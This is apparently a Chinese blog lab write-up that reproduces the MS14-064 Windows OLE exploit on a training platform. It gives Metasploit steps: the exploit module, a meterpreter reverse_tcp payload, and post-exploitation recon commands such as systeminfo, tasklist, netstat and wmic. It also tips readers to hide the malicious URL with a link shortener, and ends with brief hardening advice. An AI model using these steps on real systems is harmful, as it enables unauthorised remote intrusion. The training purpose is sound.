E030-操作系统漏洞验证及加固-MS14_064漏洞利用与安全加固

前言

        本章节我将复现MS14-064漏洞的利用过程,就不演示发现,扫描,主机漏洞的过程,直接进入验证阶段。

复现题目

任务场景:

【任务场景】

磐石公司邀请渗透测试人员对该公司的论坛进行渗透测试,小王已经发现了该公司有一台主机,打开网页后系统变得非常卡顿,并且有异常的流量向外发出,请求一些不安全的站点,进过对该系统进行全面的检查发现由于操作系统版本一直没有更新,一些漏洞没有的到修补,导致有远程代码执行的风险。

任务分析:

【任务分析】

原理及危害:OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术。UAC(User Account Control,用户帐户控制)是微软为提高系统安全而在Windows Vista中引入的新技术。Microsoft Windows在OLE组件的实现上存在安全漏洞,未经身份验证的远程攻击者可利用此漏洞执行远程代码。此漏洞源于没有正确处理含有OLE对象的Office文件。

预备知识:

【预备知识】

要利用此漏洞,需要进行用户交互。通过发送电子邮件信息给本地登录用户的攻击要想得逞,该用户必须打开包含经特殊设计的 OLE 对象的附件。许多不同类型的附带文档都可能包含受影响的 OLE 对象。所有 Office 文件类型以及其他一些第三方文件类型都可能包含恶意 OLE 对象。在电子邮件攻击情形中,攻击者可以通过向用户发送经特殊设计的文件并诱使用户打开该文件来利用此漏洞。在基于 Web 的攻击情形中,攻击者必须拥有一个网站,其中包含用来试图利用此漏洞的 PowerPoint 文件。另外,受到破坏的网站以及接受或宿主用户提供的内容的网站可能包含可能利用此漏洞的经特殊设计的网站内容。攻击者无法强迫用户访问恶意网站。相反,攻击者必须劝诱用户访问该网站,通常是让用户单击通向攻击者站点的链接。

受影响系统版本:

Microsoft Windows Vista

Microsoft Windows Server 2012

Microsoft Windows Server 2008

Microsoft Windows RT

Microsoft Windows 8.1

Microsoft Windows 8

=========================================================================

任务实施:

E030-操作系统漏洞验证及加固-MS14_064漏洞利用与安全加固

实战平台

中科磐云 P9

网络拓扑

任务环境说明:

服务器场景:p9_kali-7(用户名:root;密码:toor)

服务器场景操作系统:Kali Linux  192.168.1.102

服务器场景:p9_xp-6(用户名:admin;密码:123456)

服务器场景操作系统Microsoft Windows XP  192.168.1.113

=========================================================================

复现过程

攻击阶段

打开网络拓扑,点击启动选项,启动实验虚拟机

渗透机启动msf框架:

msfconsole

搜索相关漏洞利用模块:

search ms14-064 
use 0

或直接调用攻击模块(退出当前模块命令:back )

use exploit/windows/browser/ms14_064_ole_code_execution

看参,设置本地监听地址:

可以增加设置本地监听端口号:

使用set URIPATH命令来设置要利用网站路径:

使用set payload命令来设置反弹连接的shell(windwos/meterpreter/reverse_tcp),同时设置反弹shell回连的地址:

所有参数设置完成后,使用命令run 或者exploit来执行漏洞利用模块的操作:

,exploit成功后会生成带有攻击性的URL,这里生成的URL为:http://192.168.1.102:8080/,然后在 WindowsXP上用ie浏览器打开(正常的外网攻击是使用短链接编译此URL以达到隐藏的目的性。)

成功获取到目标靶机系统的shell:

回车后

        使用命令sessions -i 来查看当前活跃的会话,然后使用命令sessions –i id来进行不同会话之间的切换:

sessions -i 1

成功进入后渗透控制台。

这里如果需要直接进入靶机服务器shell的话可以设置payload载荷模块为windows/shell/reverse_tcp

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

后渗透阶段

系统信息收集

        先输入shell进入靶机服务器shell环境,使用命令systeminfo来收集靶机系统的基本信息。

使用命令tasklist /svc来查看当前计算机进程情况:

使用命令netstat –ano来查看计算机进程情况:

        使用命令wmic product > ins.txt 收集当前系统安装软件,版本以及安装路径等信息,此过程耗时比较久,在实际运行时酌情选择:

由于当前的载荷模块shell/reverse_tcp调用的是cmd终端,在后渗透阶段中,往往不能满足系统渗透信息收集的需求,所以为了系统完整的控制权,可以选择meterpreter模块中的reverse_tcp载荷模块,输入exit或ctrl+c退出命令提示符终端界面 

然后使用jobs命令查看后台正在运行的模块,防止设置的端口被之前的模块占用,若存在的话使用kill 命令来终止之前的工作,使用rexploit重新执行溢出模块:

由于当前系统windowsXP在微软官网上找到不到更新的补丁,建议仍在使用XP的用户可以更新到最新的win10并安装最新补丁来提高自己系统的安全性,或者在系统中安装杀毒软件来加固自己的操作系统。

加固方案

        访问网站https://www.avira.com/zh-cn/download/product/avira-free-antivirus/下载最新版的小红伞杀毒软件。

安装防火墙软件等等。

章末

本章节复现的过程非常简单,思路也比较清晰,也欢迎大佬们评论区留言讨论。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孪生质数-希灵Security

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值